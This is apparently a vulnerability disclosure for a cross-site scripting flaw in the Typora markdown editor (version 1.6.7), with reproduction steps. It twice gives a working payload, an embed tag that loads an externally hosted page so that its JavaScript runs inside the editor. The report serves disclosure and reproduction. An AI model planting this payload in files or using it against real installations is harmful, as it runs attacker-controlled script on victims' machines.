Typora XSS Vulnerability

Vulnerability Overview

There is an XSS vulnerability because the editor mishandled when parsing the embed tag in html. The html tag is <embed src="https://c0olw.github.io/pic/1.html">

Vulnerability Reproduction

  1. Download the lastest version of Typora from https://typora.io/.

    The version when I downloaded was 1.6.7.

    image-20230731105005835

  2. Use Typora to open or edit a markdown file.

    For example, I created a file called “xss test.md” with typora.

    image-20230731105728197

  1. Enter <embed src="https://c0olw.github.io/pic/1.html"> to let Typora parse the html tags, resulting in the execution of malicious Javascript.

    When just entering the embed tag:

    image-20230827235906043

    After Typora parses the embed tag:

    image-20230828000323646